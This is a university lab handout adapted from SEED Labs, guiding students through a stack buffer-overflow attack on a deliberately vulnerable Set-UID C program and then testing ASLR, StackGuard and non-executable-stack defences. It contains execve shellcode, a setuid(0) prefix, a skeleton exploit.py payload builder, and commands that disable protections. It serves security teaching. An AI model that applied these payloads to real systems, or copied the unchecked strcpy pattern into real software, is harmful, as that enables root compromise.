Secure Systems Engineering, Spring 2024

Assignment 1

Please read this description in its entirety before starting the assignment!

Introduction

A buffer overflow is the condition in which a program attempts to write data beyond the boundary of a buffer. A malicious user can exploit this vulnerability to alter the control flow of the program, leading to the execution of malicious code. You will be given a program with a buffer-overflow vulnerability; your task is to develop a scheme to exploit the vulnerability and ultimately gain root privilege. In addition to the attacks, you will be guided through several protection schemes that the operating system implements to counter buffer-overflow attacks, and you will gauge their efficacy. You will record your observations in a report and submit this report to Blackboard for grading.

Learning objectives

In this assignment, you will:

Helpful resources

Assignment setup

This assignment requires the use of the course VM.

Turning off countermeasures

Modern operating systems have implemented several security mechanisms to make the buffer-overflow attack difficult. To simplify our attacks, we need to disable them first. Later on, we will enable them and see whether our attack can still be successful or not.

Address Space Randomization. Ubuntu and several other Linux-based systems use address space randomization to randomize the starting addresses of the heap and stack. This makes guessing the exact addresses difficult, and guessing addresses is one of the critical steps of a buffer-overflow attack. This feature can be disabled using the following command:

$ sudo sysctl -w kernel.randomize_va_space=0

Configuring /bin/sh. In the recent versions of Ubuntu OS, the /bin/sh symbolic link points to the /bin/dash shell. The dash program, as well as bash, has implemented a security countermeasure that prevents itself from being executed in a Set-UID process. Basically, if they detect that they are executed in a Set-UID process, they will immediately change the effective user ID to the process’s real user ID, essentially dropping the privilege.

Since our victim program is a Set-UID program, and our attack relies on running /bin/sh, the countermeasure in /bin/dash makes our attack more difficult. Therefore, we will link /bin/sh to another shell that does not have such a countermeasure (in later tasks, we will show that with a little bit more effort, the countermeasure in /bin/dash can be easily defeated). We have installed a shell program called zsh in our Ubuntu 20.04 VM. The following command can be used to link /bin/sh to zsh:

$ sudo ln -sf /bin/zsh /bin/sh

StackGuard and Non-Executable Stack. These are two additional countermeasures implemented in the system. They can be turned off during compilation. We will discuss them later when we compile the vulnerable program.

Part 1: Shellcode

The ultimate goal of buffer-overflow attacks is to inject malicious code into the target program, so the code can be executed using the target program’s privilege. Shellcode is widely used in most code-injection attacks.

The C version of shellcode

A shellcode is basically a piece of code that launches a shell. If we use C code to implement it, it will look like the following:

#include <stdio.h>
#include <unistd.h>   /* declares execve() */
int main() {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
    return 1;         /* reached only if execve() fails */
}

Unfortunately, we cannot just compile this code and use the binary code as our shellcode. The best way to write a shellcode is to use assembly code. In this assignment, we only provide the binary version of a shellcode, without explaining how it works (it is non-trivial).

32-bit shellcode

; Store the command on stack
xor  eax, eax
push eax
push "//sh"
push "/bin"
mov  ebx, esp     ; ebx --> "/bin//sh": execve()’s 1st argument

; Construct the argument array argv[]
push eax          ; argv[1] = 0
push ebx          ; argv[0] --> "/bin//sh"
mov  ecx, esp     ; ecx --> argv[]: execve()’s 2nd argument

; For environment variable
xor edx, edx      ; edx = 0: execve()’s 3rd argument

; Invoke execve()
xor eax,eax 
mov al, 0x0b      ; execve()’s system call number
int 0x80

The shellcode above basically invokes the execve() system call to execute /bin/sh.

We have generated the binary code from the assembly code above, and put the code in a C program called call_shellcode.c inside the shellcode/ folder.
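The two string pushes in the assembly above can be checked by hand. The following is a minimal Python sketch (the helper name push_words is hypothetical, not part of the provided code) showing how "/bin//sh" splits into 32-bit little-endian words. The extra slash pads the 7-byte path "/bin/sh" to 8 bytes, so it fills two full words without introducing a zero byte; the kernel treats "//" in a path the same as "/".

```python
import struct

def push_words(path):
    """Split a byte string into the 32-bit words a series of push instructions would use.

    The stack grows toward lower addresses, so the last 4-byte chunk is
    pushed first and the first chunk ends up at the lowest address.
    """
    if len(path) % 4 != 0:
        raise ValueError("length must be a multiple of 4 bytes")
    chunks = [path[i:i + 4] for i in range(0, len(path), 4)]
    # "<I" interprets each chunk as an unsigned 32-bit little-endian integer
    return [struct.unpack("<I", chunk)[0] for chunk in reversed(chunks)]

words = push_words(b"/bin//sh")
print([hex(w) for w in words])   # ['0x68732f2f', '0x6e69622f']
```

The first value corresponds to push "//sh" and the second to push "/bin".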

Tasks (5 points)

Compile and run the 32-bit shellcode in call_shellcode.c, and observe what happens. The code includes two copies of shellcode: one is 32-bit and the other is 64-bit. We will only use the 32-bit shellcode in this assignment. Make sure to compile the program with the -m32 flag so that the 32-bit version is used; without this flag, the 64-bit version will be used. The Makefile already handles this.

In your report, describe your observations. Include a screenshot of the program running.

Interlude: The vulnerable program

The vulnerable program used in this assignment is called stack.c, which is in the code folder. This program has a buffer-overflow vulnerability, and your job is to exploit this vulnerability and gain the root privilege. The code listed below has some non-essential information removed, so it is slightly different from what you get from the repository.

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#ifndef BUF_SIZE
#define BUF_SIZE 100
#endif

void dummy_function(char *str);

int bof(char *str)
{
    char buffer[BUF_SIZE];

    // The following statement has a buffer overflow problem 
    strcpy(buffer, str);       

    return 1;
}

int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;

    badfile = fopen("badfile", "r"); 
    if (!badfile) {
       perror("Opening badfile"); exit(1);
    }

    int length = fread(str, sizeof(char), 517, badfile);
    printf("Input size: %d\n", length);
    dummy_function(str);
    fprintf(stdout, "==== Returned Properly ====\n");
    return 1;
}

The above program has a buffer-overflow vulnerability. It first reads an input from a file called badfile, and then passes this input to another buffer in the function bof(). The original input can have a maximum length of 517 bytes, but the buffer in bof() is only BUF_SIZE bytes long, which is less than 517. Because strcpy() does not check boundaries, a buffer overflow will occur. Since this program is a root-owned Set-UID program, if a normal user can exploit this buffer-overflow vulnerability, the user might be able to get a root shell. Note that the program gets its input from a file called badfile, which is under the user’s control. Our objective is to create the contents of badfile such that when the vulnerable program copies the contents into its buffer, a root shell is spawned.
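The effect of the unchecked copy can be illustrated with a toy model. The Python sketch below is not the real program: the 8-byte buffer, the frame layout (buffer, then saved frame pointer, then return address), and the two addresses are assumptions chosen only for illustration. It copies input the way strcpy() does, stopping at the first zero byte and ignoring the buffer size.

```python
BUF_SIZE = 8   # toy buffer size, far smaller than the real BUF_SIZE
WORD = 4       # size of a saved frame pointer or return address on 32-bit x86

def toy_bof(src):
    """Copy src into a toy stack frame without a bounds check and report the result."""
    # Toy frame, low to high address: buffer | saved ebp | return address.
    # Both initial values below are made up for illustration.
    frame = (bytearray(BUF_SIZE)
             + (0xffffd000).to_bytes(WORD, "little")
             + (0x56556200).to_bytes(WORD, "little"))
    # strcpy() copies up to the first zero byte; the terminator write is omitted here
    end = src.find(b"\x00")
    data = src if end < 0 else src[:end]
    data = data[:len(frame)]          # the toy model stops at the end of its frame
    frame[:len(data)] = data
    return {
        "buffer": bytes(frame[:BUF_SIZE]),
        "saved_ebp": int.from_bytes(frame[BUF_SIZE:BUF_SIZE + WORD], "little"),
        "return_address": int.from_bytes(frame[BUF_SIZE + WORD:], "little"),
    }

print(hex(toy_bof(b"AAAA")["return_address"]))   # short input: return address untouched
overflow = b"A" * (BUF_SIZE + WORD) + (0xdeadbeef).to_bytes(WORD, "little")
print(hex(toy_bof(overflow)["return_address"]))  # long input: return address overwritten
```

In the model, any input longer than BUF_SIZE + WORD bytes starts to overwrite the return address, which is the value the function jumps to when it returns.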

Compilation. When compiling the above vulnerable program, do not forget to turn off the StackGuard and non-executable stack protections using the -fno-stack-protector and -z execstack options. After compilation, we need to make the program a root-owned Set-UID program. We can achieve this by first changing the ownership of the program to root, and then changing the permission to 4755 to enable the Set-UID bit. Note that the ownership must be changed before turning on the Set-UID bit, because changing ownership turns the Set-UID bit off.

$ gcc -DBUF_SIZE=100 -m32 -o stack -z execstack -fno-stack-protector stack.c
$ sudo chown root stack
$ sudo chmod 4755 stack

The compilation and setup commands are already included in Makefile, so we just need to type make to execute those commands. The variables L1, ..., L4 are set in Makefile; they will be used during the compilation.

Part 2: Launching the attack on a 32-bit program (Level-1)

To exploit the buffer-overflow vulnerability in the target program, the most important thing to know is the distance between the buffer’s starting position and the place where the return-address is stored. We will use a debugging method to find it out. Since we have the source code of the target program, we can compile it with the debugging flag turned on. That will make it more convenient to debug.

We will add the -g flag to gcc command, so debugging information is added to the binary. If you run make, the debugging version is already created. We will use gdb to debug stack-L1-dbg. We need to create a file called badfile before running the program.

$ touch badfile              <- Create an empty badfile
$ gdb stack-L1-dbg
gdb-peda$ b bof              <- Set a break point at function bof()
Breakpoint 1 at 0x124d: file stack.c, line 18. 
gdb-peda$ run                <- Start executing the program 
...
Breakpoint 1, bof (str=0xffffcf57 ...) at stack.c:18
18 {
gdb-peda$ next               <- See the note below
...
22     strcpy(buffer, str);
gdb-peda$ p $ebp             <- Get the ebp value 
$1 = (void *) 0xffffdfd8
gdb-peda$ p &buffer          <- Get the buffer’s address 
$2 = (char (*)[100]) 0xffffdfac
gdb-peda$ quit               <- Exit

Note 1. When gdb stops inside the bof() function, it stops before the ebp register is set to point to the current stack frame, so if we print out the value of ebp here, we will get the caller’s ebp value. We need to use next to execute a few instructions and stop after the ebp register is modified to point to the stack frame of the bof() function. The SEED book is based on Ubuntu 16.04, and gdb’s behavior is slightly different, so the book does not have the next step.

Note 2. The frame pointer value obtained from gdb is different from the value during actual execution (without gdb). This is because gdb pushes some environment data onto the stack before running the debugged program. When the program runs directly, the stack does not contain that data, so the actual frame pointer value will be larger. Keep this in mind when constructing your payload.
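The distance mentioned at the start of this part follows from the two values printed by gdb. On 32-bit x86 with a frame pointer, the saved ebp is stored at the address ebp points to, and the return address sits one 4-byte word above it. The sketch below is a minimal illustration (the function name is hypothetical); it plugs in the sample values from the transcript above, which are for illustration only and will differ from what you observe.

```python
def return_address_offset(ebp, buffer_addr, word_size=4):
    """Distance in bytes from the start of the buffer to the stored return address."""
    distance_to_saved_ebp = ebp - buffer_addr
    # The return address is stored immediately above the saved frame pointer
    return distance_to_saved_ebp + word_size

# Sample values copied from the gdb transcript; use your own measurements instead
print(return_address_offset(0xffffdfd8, 0xffffdfac))   # 48
```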

Launching attacks

To exploit the buffer-overflow vulnerability in the target program, we need to prepare a payload, and save it inside badfile. We will use a Python program to do that. We provide a skeleton program called exploit.py, which is included in the repository. The code is incomplete, and students need to replace some of the essential values in the code.

#!/usr/bin/python3
import sys

# Replace the content with the actual shellcode
shellcode= (
  "\x90\x90\x90\x90"  
  "\x90\x90\x90\x90"  
).encode('latin-1')

# Fill the content with NOP's
content = bytearray(0x90 for i in range(517)) 

##################################################################
# Put the shellcode somewhere in the payload
start = 0               # Change this number 
content[start:start + len(shellcode)] = shellcode

# Decide the return address value 
# and put it somewhere in the payload
ret    = 0x00           # Change this number 
offset = 0              # Change this number 

L = 4     # Use 4 for 32-bit address and 8 for 64-bit address
content[offset:offset + L] = (ret).to_bytes(L,byteorder='little') 
##################################################################

# Write the content to a file
with open('badfile', 'wb') as f:
  f.write(content)

Run this program to generate the contents for badfile. Then run the vulnerable program stack.

$ ./exploit.py     <- create the badfile
$ ./stack-L1       <- launch the attack by running the vulnerable program
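One detail worth checking before running the attack is whether the payload contains a zero byte, because strcpy() stops copying at the first one. The following Python sketch mirrors the way the skeleton places the return address; the helper names, the offset 112, and both addresses are hypothetical values chosen for illustration, not values for the actual attack.

```python
def build_payload(ret, offset, size=517, word=4):
    """Fill a payload with NOPs and place a little-endian return address at offset."""
    content = bytearray(0x90 for _ in range(size))
    content[offset:offset + word] = ret.to_bytes(word, byteorder="little")
    return bytes(content)

def strcpy_stop_index(payload):
    """Index of the first zero byte, where strcpy() would stop copying, or -1 if none."""
    return payload.find(b"\x00")

# Little-endian layout: the least significant byte comes first in memory
print((0xffffd0a0).to_bytes(4, byteorder="little").hex())   # a0d0ffff

print(strcpy_stop_index(build_payload(0xffffd0a0, 112)))    # -1: whole payload is copied
print(strcpy_stop_index(build_payload(0xffffd000, 112)))    # 112: copy stops at the address
```

In the second case the low byte of the address is zero, so the copy would end before the return address is fully written.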

Tasks (35 points)

Finish the above program to execute the buffer overflow attack. If your exploit is implemented correctly, you should be able to get a root shell:

$ ./exploit.py 
$ ./stack-L1
#                  <- Bingo! You've got a root shell!

In your report, in addition to providing screenshots to demonstrate your investigation and attack, you also need to explain how the values used in your exploit.py are decided. These values are the most important part of the attack, so a detailed explanation can help the instructor grade your report. Only demonstrating a successful attack without explaining why the attack works will not receive many points.

Part 3: Launching the attack without knowing the buffer size (Level-2)

Part 3 is no longer a part of the assignment. You can skip this part, and move straight to Part 4.

Part 4: Defeating dash’s countermeasure

The dash shell in Ubuntu drops privileges when it detects that the effective UID does not equal the real UID (which is the case in a Set-UID program). It does so by changing the effective UID back to the real UID. In the previous tasks, we let /bin/sh point to another shell called zsh, which does not have such a countermeasure. In this task, we will change it back and see how we can defeat the countermeasure. Run the following command so that /bin/sh points back to /bin/dash.

$ sudo ln -sf /bin/dash /bin/sh

To defeat the countermeasure in buffer-overflow attacks, all we need to do is to change the real UID, so it equals the effective UID. When a root-owned Set-UID program runs, the effective UID is zero, so before we invoke the shell program, we just need to change the real UID to zero. We can achieve this by invoking setuid(0) before executing execve() in the shellcode.

The following assembly code shows how to invoke setuid(0). The binary code is already put inside call_shellcode.c. You just need to add it to the beginning of the shellcode.

; Invoke setuid(0): 32-bit
xor ebx, ebx      ; ebx = 0: setuid()’s argument
xor eax, eax
mov  al, 0xd5     ; setuid()’s system call number
int 0x80

; Invoke setuid(0): 64-bit
xor rdi, rdi      ; rdi = 0: setuid()’s argument
xor rax, rax
mov  al, 0x69     ; setuid()’s system call number
syscall
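The reasoning behind calling setuid(0) first can be traced with a simplified model. The Python sketch below is an assumption-laden illustration, not the real dash or kernel logic: it tracks only the real and effective UIDs, and its setuid model covers only the case of a process whose effective UID is zero. The function names and the UID 1000 are hypothetical.

```python
def dash_startup(ruid, euid):
    """Simplified model of the shell countermeasure: drop privilege if the UIDs differ."""
    if euid != ruid:
        euid = ruid
    return ruid, euid

def setuid_as_root(ruid, euid, new_uid):
    """Simplified model of setuid(): with effective UID 0, the real UID changes as well."""
    if euid != 0:
        raise PermissionError("this toy model only covers processes with effective UID 0")
    return new_uid, new_uid

# A normal user (UID 1000 here, as an example) runs a root-owned Set-UID program
ruid, euid = 1000, 0

print(dash_startup(ruid, euid))                              # (1000, 1000): privilege dropped
print(dash_startup(*setuid_as_root(ruid, euid, 0)))          # (0, 0): shell keeps root
```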

Tasks (10 points)

  1. Compile call_shellcode.c into a root-owned binary (by typing “make setuid”). Run the shellcode a32.out with and without the setuid(0) system call. Please describe and explain your observations.
  2. Now, using the updated shellcode, we can attempt the attack again on the vulnerable program, and this time, with the shell’s countermeasure turned on. Repeat your attack on Level 1, and see whether you can get the root shell. After getting the root shell, please run the following command to prove that the countermeasure is turned on. Include a screenshot in your report.
# ls -l /bin/sh /bin/zsh /bin/dash

Part 5: Defeating address randomization

On 32-bit Linux machines, stacks only have 19 bits of entropy, which means the stack base address can have 2^19 = 524,288 possibilities. This number is not that high and can be exhausted easily with a brute-force approach. In this part, we use such an approach to defeat the address randomization countermeasure on our 32-bit VM.
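The size of the search space is quick to verify. The sketch below computes the number of possible stack base addresses and, as a rough guide only, how long that many runs would take; the rate of 1,000 runs per second is an assumed figure, not a measurement from the course VM.

```python
def stack_base_possibilities(entropy_bits):
    """Number of distinct stack base addresses for the given bits of entropy."""
    return 2 ** entropy_bits

def minutes_for_runs(runs, runs_per_second):
    """Time in minutes needed to execute the given number of runs at a fixed rate."""
    return runs / runs_per_second / 60

total = stack_base_possibilities(19)
print(total)                                   # 524288

# Assumed rate; the actual speed depends on the machine
print(round(minutes_for_runs(total, runs_per_second=1000), 1))
```

Because the address is re-randomized on every run, the actual number of attempts varies from one experiment to the next.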

Tasks (10 points)

  1. First, we turn on the Ubuntu’s address randomization using the following command. Then we run the same attack against stack-L1. Please describe and explain your observation in your report.
$ sudo /sbin/sysctl -w kernel.randomize_va_space=2
  2. We then use the brute-force approach to attack the vulnerable program repeatedly, hoping that the address we put in the badfile can eventually be correct. We will only try this on stack-L1, which is a 32-bit program. You can use the following shell script to run the vulnerable program in an infinite loop. If your attack succeeds, the script will stop; otherwise, it will keep running. Please be patient, as this may take a few minutes, but if you are very unlucky, it may take longer. Please describe your observation in your report.
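A loop of this kind can also be sketched in Python. The version below is an illustration under stated assumptions, not the course's script: the function names are hypothetical, and it treats a negative return code (which Python's subprocess module reports on POSIX when the child is killed by a signal such as a segmentation fault) as a failed guess. On a successful guess the spawned shell takes over the terminal, and the loop ends once that shell exits.

```python
import subprocess
import time

def run_target(cmd=("./stack-L1",)):
    """Run the vulnerable program once and return its exit status."""
    return subprocess.run(list(cmd)).returncode

def brute_force(run_once=run_target, max_attempts=None):
    """Re-run the target until it exits without being killed by a signal.

    Returns the number of attempts used, or None if max_attempts is reached.
    """
    start = time.monotonic()
    attempts = 0
    while max_attempts is None or attempts < max_attempts:
        attempts += 1
        status = run_once()
        elapsed = int(time.monotonic() - start)
        print(f"{elapsed // 60} minutes and {elapsed % 60} seconds elapsed; "
              f"{attempts} runs so far.")
        # Assumption: a wrong guess crashes the program, giving a negative status
        if status >= 0:
            return attempts
    return None
```

Calling brute_force() with no arguments from the directory containing stack-L1 and badfile starts the loop; passing max_attempts bounds the number of runs.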

Part 6: StackGuard protection

Many compilers, such as gcc, implement a security mechanism called StackGuard to prevent buffer overflows. In the presence of this protection, buffer-overflow attacks will not work. In the previous parts, we disabled the StackGuard protection mechanism when compiling the programs. In this part, we will turn it on and see what happens.

Tasks (5 points)

First, repeat the Level-1 attack with the StackGuard off, and make sure that the attack is still successful. Remember to turn off the address randomization, because you have turned it on in the previous task. Then, we turn on the StackGuard protection by recompiling the vulnerable stack.c program without the -fno-stack-protector flag. In gcc version 4.3.3 and above, StackGuard is enabled by default. Launch the attack; report and explain your observations.

Part 7: Non-executable stack protection

Operating systems used to allow executable stacks, but this has now changed: in Ubuntu, the binary images of programs (and shared libraries) must declare whether they require executable stacks or not, i.e., they need to mark a field in the program header. The kernel or dynamic linker uses this marking to decide whether to make the stack of the running program executable or non-executable. This marking is done automatically by gcc, which by default makes the stack non-executable. We can explicitly make it non-executable using the “-z noexecstack” flag during compilation. In our previous tasks, we used “-z execstack” to make stacks executable.

Aside. It should be noted that non-executable stack only makes it impossible to run shellcode on the stack, but it does not prevent buffer-overflow attacks, because there are other ways to run malicious code after exploiting a buffer-overflow vulnerability. The return-to-libc attack is an example.

Tasks (5 points)

In this task, we will make the stack non-executable. We will do this experiment in the shellcode folder. The call_shellcode program puts a copy of shellcode on the stack, and then executes the code from the stack. Please recompile call_shellcode.c into a32.out without the “-z execstack” option. Run it, then describe and explain your observations.

What to turn in

Submit the following to Blackboard before the assignment due date:

Although this is a group assignment, each member of the group needs to submit their own copy to Blackboard.

Attribution

Original SEED Labs version Copyright © 2006-2020 Wenliang Du. Modifications by Tushar Jois for Secure Systems Engineering, Spring 2024.

This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License. If you remix, transform, or build upon the material, this copyright notice must be left intact, or reproduced in a way that is reasonable to the medium in which the work is being re-published.